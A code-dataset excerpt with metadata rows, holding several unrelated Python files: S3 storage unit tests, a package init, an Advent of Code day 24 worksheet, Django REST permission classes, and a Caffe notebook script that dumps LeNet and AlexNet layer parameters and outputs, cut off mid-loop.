] | 1 | 2018-06-09T14:00:41.000Z | 2018-06-09T14:00:41.000Z | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
] | null | null | null | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import os
import time
import unittest
from py3s3.storage import S3ContentFile
from py3s3.storage import S3IOError
from py3s3.storage import S3Storage
BUCKET = os.getenv('AWS_S3_BUCKET', None)
AWS_ACCESS_KEY = os.getenv('AWS_S3_ACCESS_KEY', None)
AWS_SECRET_KEY = os.getenv('AWS_S3_SECRET_KEY', None)
class Py3s3S3StorageTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.datetime = datetime.datetime.now()
cls.modify_time_dt = None
def setUp(self):
self.test_content = ''.join([
'This test content file was uploaded at about ',
str(self.datetime)
])
self.test_file_name = '/testdir/test.txt'
self.file = S3ContentFile(self.test_content, self.test_file_name, '')
self.storage = S3Storage('', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)
def test__000_get_available_name(self):
# TODO
pass
def test__000_get_content_type(self):
self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')
def test__101_HEAD_returns_test_file_existance(self):
self.assertFalse(self.storage.exists(self.test_file_name))
def test__102_PUT_saves_test_file_to_s3(self):
name = self.storage._save(self.test_file_name, self.file)
self.assertEqual(name, self.test_file_name)
self.__class__.modify_time_dt = datetime.datetime.utcnow()
def test__301_HEAD_returns_test_file_existance(self):
self.assertTrue(self.storage.exists(self.test_file_name))
def test__302_HEAD_returns_correct_file_size(self):
size = self.storage.size(self.test_file_name)
self.assertEqual(size, self.file.size)
def test__303_HEAD_returns_correct_modified_time(self):
time_ = self.storage.modified_time(self.test_file_name)
self.assertAlmostEqual(
time_, self.__class__.modify_time_dt,
delta=datetime.timedelta(seconds=60)
)
def test__304_HEAD_returns_correct_media_type(self):
headers = self.storage._get_response_headers(self.test_file_name)
self.assertEqual(headers['Content-Type'], 'text/plain')
def test__501_GET_pulls_test_file_down(self):
file = self.storage._open(self.test_file_name)
self.assertEqual(self.file.content, file.content)
def test__701_DELETE_deletes_test_file_from_s3(self):
self.storage.delete(self.test_file_name)
self.assertFalse(self.storage.exists(self.test_file_name))
class Py3s3S3StorageWithNamePrefixTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.datetime = datetime.datetime.now()
cls.modify_time_dt = None
def setUp(self):
self.test_content = ''.join([
'This test content file was uploaded at about ',
str(self.datetime)
])
self.test_file_name = '/testdir/test.txt'
self.file = S3ContentFile(self.test_content, self.test_file_name, '')
self.storage = S3Storage('static', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)
def test__000_get_available_name(self):
# TODO
pass
def test__000_get_content_type(self):
self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')
def test__101_HEAD_returns_test_file_existance(self):
self.assertFalse(self.storage.exists(self.test_file_name))
def test__102_PUT_saves_test_file_to_s3(self):
name = self.storage._save(self.test_file_name, self.file)
self.assertEqual(name, self.test_file_name)
self.__class__.modify_time_dt = datetime.datetime.utcnow()
def test__301_HEAD_returns_test_file_existance(self):
self.assertTrue(self.storage.exists(self.test_file_name))
def test__302_HEAD_returns_correct_file_size(self):
size = self.storage.size(self.test_file_name)
self.assertEqual(size, self.file.size)
def test__303_HEAD_returns_correct_modified_time(self):
time_ = self.storage.modified_time(self.test_file_name)
self.assertAlmostEqual(
time_, self.__class__.modify_time_dt,
delta=datetime.timedelta(seconds=60)
)
def test__304_HEAD_returns_correct_media_type(self):
headers = self.storage._get_response_headers(self.test_file_name)
self.assertEqual(headers['Content-Type'], 'text/plain')
def test__501_GET_pulls_test_file_down(self):
file = self.storage._open(self.test_file_name)
self.assertEqual(self.file.content, file.content)
def test__701_DELETE_deletes_test_file_from_s3(self):
self.storage.delete(self.test_file_name)
self.assertFalse(self.storage.exists(self.test_file_name))
class Py3s3S3StorageLargeFileSizeTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.datetime = datetime.datetime.now()
cls.modify_time_dt = None
def setUp(self):
self.test_content = '\n'.join([
'This test content file was uploaded at about {}'.format(self.datetime),
'\n'.join(str(n) for n in range(200000))
])
self.test_file_name = '/testdir/large_test.txt'
self.file = S3ContentFile(self.test_content, self.test_file_name, '')
self.storage = S3Storage('', BUCKET, AWS_ACCESS_KEY, AWS_SECRET_KEY)
def test__000_get_available_name(self):
# TODO
pass
def test__000_get_content_type(self):
self.assertEqual(self.storage._get_content_type(self.file), 'text/plain')
def test__101_HEAD_returns_test_file_existance(self):
self.assertFalse(self.storage.exists(self.test_file_name))
def test__102_PUT_saves_test_file_to_s3(self):
name = self.storage._save(self.test_file_name, self.file)
self.assertEqual(name, self.test_file_name)
self.__class__.modify_time_dt = datetime.datetime.utcnow()
def test__301_HEAD_returns_test_file_existance(self):
self.assertTrue(self.storage.exists(self.test_file_name))
def test__302_HEAD_returns_correct_file_size(self):
size = self.storage.size(self.test_file_name)
self.assertEqual(size, self.file.size)
def test__303_HEAD_returns_correct_modified_time(self):
time_ = self.storage.modified_time(self.test_file_name)
self.assertAlmostEqual(
time_, self.__class__.modify_time_dt,
delta=datetime.timedelta(seconds=60)
)
def test__304_HEAD_returns_correct_media_type(self):
headers = self.storage._get_response_headers(self.test_file_name)
self.assertEqual(headers['Content-Type'], 'text/plain')
def test__501_GET_pulls_test_file_down(self):
file = self.storage._open(self.test_file_name)
self.assertEqual(self.file.content, file.content)
def test__701_DELETE_deletes_test_file_from_s3(self):
self.storage.delete(self.test_file_name)
self.assertFalse(self.storage.exists(self.test_file_name))
if __name__ == '__main__':
unittest.main() | 37.31383 | 84 | 0.714469 | 940 | 7,015 | 4.917021 | 0.106383 | 0.088273 | 0.093466 | 0.124621 | 0.915188 | 0.903289 | 0.903289 | 0.903289 | 0.903289 | 0.894418 | 0 | 0.023697 | 0.187883 | 7,015 | 188 | 85 | 37.31383 | 0.787608 | 0.001996 | 0 | 0.836879 | 0 | 0 | 0.050729 | 0.003287 | 0 | 0 | 0 | 0.005319 | 0.191489 | 1 | 0.255319 | false | 0.021277 | 0.049645 | 0 | 0.326241 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e0a46ea366ba21eda4cb6e7dcf99acc21e052b54 | 183 | py | Python | runai/utils/__init__.py | run-ai/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 86 | 2020-01-23T18:56:41.000Z | 2022-02-14T22:32:08.000Z | runai/utils/__init__.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 18 | 2020-01-24T17:55:18.000Z | 2021-12-01T01:01:32.000Z | runai/utils/__init__.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 12 | 2020-02-03T14:30:44.000Z | 2022-01-08T16:06:59.000Z | from .attribute import Attribute
from .flock import Flock
from .hook import Hook
from . import attribute
from . import flock
from . import log
from . import random
from . import gpus
| 20.333333 | 32 | 0.781421 | 27 | 183 | 5.296296 | 0.296296 | 0.34965 | 0.265734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174863 | 183 | 8 | 33 | 22.875 | 0.94702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e0a4bd882720894ecf623dec246d87938e56d18b | 5,472 | py | Python | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | day24/worksheet.py | tomp/AOC-2021 | aaf96c0f679c31eeaa0884dc94ce3b55c5cf190e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
inp = [1, 3, 5, 7, 9, 2, 4, 6, 8, 9, 9, 9, 9, 9]
inp = [1, 3, 5, 2, 9, 2, 4, 6, 8, 9, 9, 9, 9, 9]
inp = [1, 3, 5, 2, 9, 2, 5, 6, 8, 9, 9, 9, 9, 9]
inp = [1, 3, 5, 2, 7, 2, 5, 9, 8, 9, 9, 9, 9, 9]
inp = [1, 3, 5, 2, 7, 2, 5, 9, 8, 3, 9, 9, 9, 9]
inp = [1, 1, 5, 2, 7, 2, 5, 9, 8, 3, 9, 8, 8, 9]
inp = [9, 1, 5, 2, 7, 2, 5, 9, 8, 3, 9, 8, 8, 1]
w, x, y, z = 0, 0, 0, 0
step = 0
def print_state(step, w, x, y, z):
print(f"@{step+1:-2d} w:{w:-2d} x:{x:-2d} y:{y:-2d} z:{z:-2d}")
# >>> @1
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 11
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 11) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 3
# mul y x
# add z y
y = (w + 3) * x
z = z + (w + 3) * x
print_state(step, w, x, y, z)
step += 1
# >>> @2
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 14
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 14) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 7
# mul y x
# add z y
y = (w + 7) * x
z = z + (w + 7) * x
print_state(step, w, x, y, z)
step += 1
# >>> @3
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 13
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 13) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 1
# mul y x
# add z y
y = (w + 1) * x
z = z + (w + 1) * x
print_state(step, w, x, y, z)
step += 1
# >>> @4
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -4
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 4) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 6
# mul y x
# add z y
y = (w + 6) * x
z = z + (w + 6) * x
print_state(step, w, x, y, z)
step += 1
# >>> @5
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 11
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 11) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 14
# mul y x
# add z y
y = (w + 14) * x
z = z + (w + 14) * x
print_state(step, w, x, y, z)
step += 1
# >>> @6
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 10
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 10) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 7
# mul y x
# add z y
y = (w + 7) * x
z = z + (w + 7) * x
print_state(step, w, x, y, z)
step += 1
# >>> @7
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -4
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 4) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 9
# mul y x
# add z y
y = (w + 9) * x
z = z + (w + 9) * x
print_state(step, w, x, y, z)
step += 1
# >>> @8
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -12
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 12) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 9
# mul y x
# add z y
y = (w + 9) * x
z = z + (w + 9) * x
print_state(step, w, x, y, z)
step += 1
# >>> @9
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 10
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 10) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 6
# mul y x
# add z y
y = (w + 6) * x
z = z + (w + 6) * x
print_state(step, w, x, y, z)
step += 1
# >>> @10
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -11
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 11) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 4
# mul y x
# add z y
y = (w + 4) * x
z = z + (w + 4) * x
print_state(step, w, x, y, z)
step += 1
# >>> @11
# inp w
# mul x 0
# add x z
# mod x 26
# div z 1
# add x 12
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 12) != w)
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 0
# mul y x
# add z y
y = (w + 0) * x
z = z + (w + 0) * x
print_state(step, w, x, y, z)
step += 1
# >>> @12
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -1
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 1) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 7
# mul y x
# add z y
y = (w + 7) * x
z = z + (w + 7) * x
print_state(step, w, x, y, z)
step += 1
# >>> @13
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x 0
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) + 0) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 12
# mul y x
# add z y
y = (w + 12) * x
z = z + (w + 12) * x
print_state(step, w, x, y, z)
step += 1
# >>> @14
# inp w
# mul x 0
# add x z
# mod x 26
# div z 26
# add x -11
# eql x w
# eql x 0
w = inp[step]
x = int(((z % 26) - 11) != w)
z = z // 26
# mul y 0
# add y 25
# mul y x
# add y 1
# mul z y
y = 25*x + 1
z = z * (25*x + 1)
# mul y 0
# add y w
# add y 1
# mul y x
# add z y
y = (w + 1) * x
z = z + (w + 1) * x
print_state(step, w, x, y, z)
step += 1
| 11.213115 | 71 | 0.438962 | 1,421 | 5,472 | 1.679803 | 0.026742 | 0.093842 | 0.058651 | 0.093842 | 0.938416 | 0.938416 | 0.935484 | 0.927943 | 0.902807 | 0.901969 | 0 | 0.145512 | 0.360746 | 5,472 | 487 | 72 | 11.23614 | 0.536878 | 0.395651 | 0 | 0.790698 | 0 | 0.007752 | 0.018762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007752 | false | 0 | 0 | 0 | 0.007752 | 0.124031 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
46190f565977783336f3d3a58429ad66c4f88fbb | 106 | py | Python | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 9 | 2019-07-29T09:46:12.000Z | 2021-11-15T10:29:33.000Z | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 49 | 2019-07-26T15:02:07.000Z | 2022-02-18T06:31:18.000Z | backend/scripts/starter.py | Doarakko/kagoole | b0657099335c76af9b8d4bbc3311a52daebcbb5a | [
"MIT"
] | 2 | 2019-07-30T00:06:24.000Z | 2020-03-22T19:22:56.000Z | from scripts.batch import save_competitions
def run():
save_competitions(page=1, in_progress=False)
| 17.666667 | 48 | 0.783019 | 15 | 106 | 5.333333 | 0.866667 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0.132075 | 106 | 5 | 49 | 21.2 | 0.858696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1cfea7512e2b88651d5accd82afa648e49ada701 | 1,396 | py | Python | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | api_yamdb/api/permissions.py | LHLHLHE/api_yamdb | bda83815a47f3fda03d54220dfe41e9263ff1b05 | [
"MIT"
] | null | null | null | from rest_framework import permissions
class AdminPermission(permissions.BasePermission):
def has_permission(self, request, view):
return (request.user.is_authenticated
and request.user.is_admin)
def has_object_permission(self, request, view, obj):
return (request.user.is_authenticated
and request.user.is_admin)
class ForMePermission(permissions.BasePermission):
def has_permission(self, request, view):
return (request.user.is_authenticated
and view.action in ('retrieve',
'update',
'partial_update',
'destroy'))
def has_object_permission(self, request, view, obj):
return view.kwargs['username'] == 'me'
class ReadOnlyPermission(permissions.BasePermission):
def has_permission(self, request, view):
return request.method in permissions.SAFE_METHODS
def has_object_permission(self, request, view, obj):
return request.method in permissions.SAFE_METHODS
class CreateAndUpdatePermission(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.is_authenticated
def has_object_permission(self, request, view, obj):
return (request.user.is_moderator
or obj.author == request.user)
| 31.727273 | 60 | 0.655444 | 145 | 1,396 | 6.151724 | 0.275862 | 0.053812 | 0.188341 | 0.224215 | 0.748879 | 0.748879 | 0.748879 | 0.681614 | 0.681614 | 0.630045 | 0 | 0 | 0.26361 | 1,396 | 43 | 61 | 32.465116 | 0.867704 | 0 | 0 | 0.535714 | 0 | 0 | 0.032235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.035714 | 0.285714 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
e81352232e4e5838446698c59ca3e3560369d489 | 25,896 | py | Python | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null | _data/write_net_info.py | Gxllii/Gxllii.github.io | ecd5d410153e4f4ca01721f47a3665cf1ce5e0de | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
get_ipython().magic(u'matplotlib inline')
caffe_root = '../' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
import caffe
# In[269]:
model_def = caffe_root + '/examples/mnist/lenet_batch1.prototxt'
model_weights = caffe_root + '/examples/mnist/lenet_iter_10000.caffemodel'
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# In[270]:
import sys
import numpy as np
import lmdb
import caffe
import argparse
from matplotlib import pyplot
lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
t = 0
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
print 'key: ',key
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
y = datum.label#图片的label
print flat_x.shape
print type(flat_x)
x2 = flat_x.reshape((28,28))
print y
fig = pyplot.figure()#把两张图片显示出来
pyplot.imshow(x2, cmap = plt.cm.gray)
t = t + 1
if t > 1 :
break
# In[31]:
# copy the image data into the memory allocated for the net
net.blobs['data'].data[...] = x
### perform classification
caffe.set_device(0)
caffe.set_mode_gpu()
output = net.forward()
output_prob = output['prob'][0] # the output probability vector for the first image in the batch
print 'predicted class is:', output_prob.argmax()
# In[271]:
# for each layer, show the output shape
for layer_name, blob in net.blobs.iteritems():
print layer_name + '\t' + str(blob.data.shape)
# In[272]:
# (output_channels, input_channels, filter_height, filter_width)
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
# In[281]:
for layer in net.layer_dict:
print layer
#for name in net.bottom_names:
#print name
# In[55]:
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import caffe
caffe_root = '../' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + 'models/bvlc_reference_caffenet/deploy.prototxt'
model_weights = caffe_root + 'models/bvlc_reference_caffenet/bvlc_reference_caffenet.caffemodel'
### load net model
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
### mean image
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
### input image
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
### set gpu
caffe.set_device(0) # if we have multiple GPUs, pick the first one
caffe.set_mode_gpu()
net.forward()
### output shape of layer >>> output.txt
# for each layer, show the output shape
for layer_name, blob in net.blobs.iteritems():
f1 = open('/home/liguangli/split_net/caffenet/layer_output/' + layer_name + '.txt', 'w')
print layer_name + '\t' + str(blob.data.shape)
f1.write(layer_name + ' ' + str(blob.data.shape) + '\n')
for element in blob.data.flat:
#for element in np.nonzero(blob.data):
f1.write(str(element) + " ")
f1.write('\n')
f1.close()
# In[56]:
### param shape of layer >>> param_shape.txt
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# In[15]:
import sys
import numpy as np
import lmdb
import caffe
import argparse
from matplotlib import pyplot
lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
print 'key: ',key
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
y = datum.label#图片的label
print flat_x.shape
print type(flat_x)
x2 = flat_x.reshape((28,28))
print y
fig = pyplot.figure()#把两张图片显示出来
pyplot.imshow(x2, cmap = plt.cm.gray)
break
# In[58]:
####### mnist-lenet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + 'examples/mnist/lenet_batch1.prototxt'
model_weights = caffe_root + 'examples/mnist/lenet_iter_10000.caffemodel'
outputdir = '/home/liguangli/split_net/lenet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
# 1000 images forward
lmdbpath = '/home/liguangli/work/caffe/examples/mnist/mnist_test_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
#print 'key: ',key
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
y = datum.label #图片的label
net.blobs['data'].data[...] = x
output = net.forward()
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'a+')
for element in blob.data.flat:
f2.write("{0:.8f} ".format(element))
f2.write('\n')
f2.close()
if n % 100 == 0:
print "{0}/1000".format(n)
n = n + 1
if n > 1000 :
break
# In[255]:
###imagenet-alexnet
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
import lmdb
import caffe
import argparse
import cv2
get_ipython().magic(u'matplotlib inline')
caffe_root = '/home/liguangli/work/caffe' # this file should be run from {caffe_root}/examples (otherwise change this line)
sys.path.insert(0, caffe_root + 'python')
model_def = caffe_root + '/models/bvlc_alexnet/deploy_batch1.prototxt'
model_weights = caffe_root + '/models/bvlc_alexnet/bvlc_alexnet.caffemodel'
outputdir = '/home/liguangli/split_net/alexnet'
# parse net
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# set gpu
caffe.set_device(0)
caffe.set_mode_gpu()
# write params
for layer_name, param in net.params.iteritems():
print layer_name + '\t' + str(param[0].data.shape)
f1 = open( outputdir + '/layer_param/' + layer_name + '.txt', 'w+')
f1.write(layer_name + " ")
for temp in param[0].data.shape:
f1.write(str(temp) + " ")
f1.write("\n")
for element in param[0].data.flat:
f1.write("{0:.8f} ".format(element))
f1.write('\n')
f1.close()
print "params done"
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + '/python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
print 'mean-subtracted values:', zip('BGR', mu)
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
#transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# 1000 images forward
lmdbpath = '/dataset/ilsvrc12_val_lmdb'
env = lmdb.open(lmdbpath, readonly=True)
n = 1
# create output files
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'w+')
f2.write(layer_name + " ")
for temp in blob.data.shape:
f2.write(str(temp) + " ")
f2.write("\n")
f2.close()
print "output create done"
with env.begin() as txn:
cursor = txn.cursor()
for key, value in cursor:
datum = caffe.proto.caffe_pb2.Datum() #datum类型
datum.ParseFromString(value) #转成datum
flat_x = np.fromstring(datum.data, dtype=np.uint8) #转成numpy类型
x = flat_x.reshape(datum.channels, datum.height, datum.width)
xx = np.transpose(x, (1,2,0))
y = datum.label #图片的label
xx = cv2.cvtColor(xx, cv2.COLOR_BGR2RGB)
transformed_image = transformer.preprocess('data', xx)
#image = caffe.io.load_image(caffe_root + '/examples/images/cat.jpg')
#transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#print "done"
if n % 10 == 0:
print "{0}/100".format(n)
for layer_name, blob in net.blobs.iteritems():
f2 = open(outputdir + '/layer_output/' + layer_name + '.txt', 'a+')
for element in blob.data.flat:
